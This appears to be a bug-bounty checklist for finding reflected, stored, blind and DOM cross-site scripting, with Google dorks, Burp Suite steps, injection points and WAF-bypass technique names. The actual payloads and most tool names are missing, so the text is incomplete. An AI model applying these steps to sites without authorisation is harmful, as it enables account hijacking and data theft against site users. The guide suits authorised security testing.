XSS
Last updated
Last updated
Reflected XSS attacks exploit vulnerabilities where user input is included in the response without proper sanitization. Below are some common approaches.
An extensive mind map detailing approaches to reflected XSS can be found here: by .
Install the Reflection and Sentinel plugins for Burp Suite.
Walk and spider the target site.
Inspect the reflected parameters tab in Burp.
Send parameters to Sentinel for automated analysis or verify manually.
Use or to collect URLs.
Filter parameters using grep "=" or GF patterns and store them in a file.
Run or on the file.
Manually inspect reflected parameters or use .
Use Google Dork: site:target.com
Find links with parameters using dorks such as:
site:target.com inurl:".php?"
site:target.com filetype:php
Check if parameters are reflected in HTML.
Inject XSS payloads or test with automated tools.
Inspect JavaScript and HTML source files for hidden parameters.
Search manually in Page Source for:
var=
=""
=''
Append discovered parameters to URLs, e.g.,
https://example.com?hiddenvariablename=xss
Use Methods 1 or 2 to gather URLs.
Find WAF bypass payloads:
Twitter search
Examine error pages (404, 403, etc.) for reflected values.
Trigger a 403 error by requesting the .htaccess file.
Test all reflected parameters for XSS.
Stored XSS occurs when malicious scripts are permanently stored on the target website.
Enumerate the firewall and identify WAF rules.
Test payloads in fields such as:
Username
Address
Inject payloads in profile picture filenames and metadata.
Attempt injections in comments, reviews, and feedback sections.
Try every input field that reflects data to other users.
Register an account with an XSS payload in the name field.
Test entity injection with:
If any payload is executed, refine and escalate the attack.
Blind XSS occurs when the payload does not immediately reflect, but executes later in backend systems or admin panels.
Inject payloads that call back to a listener on your server.
Use:
Burp Collaborator
Ngrok for receiving callbacks.
Test injection points such as:
Contact forms
Admin dashboards
User input logs
E-commerce checkout fields
Review and feedback forms
Address fields in e-commerce sites
User-Agent headers
Log viewers
Chat applications
Moderation panels
DOM XSS occurs when JavaScript dynamically manipulates the page without sanitizing user input.
Manual detection is difficult; use tools like:
Burp Suite PRO
Replace < and > with HTML entities:
Use XSS polyglots:
Bypass lowercase filtering:
Break firewall regex using new lines:
Double Encoding:
Recursive filters bypass:
Injecting anchor tags without whitespace:
Bypassing whitespace filtering using a bullet (•):
Changing request methods:
Injecting CRLF characters for HTTP response splitting:
More dorks:
Identify the firewall using .
Use to discover hidden parameters.
Enhanced and reformatted for HowToHunt repository by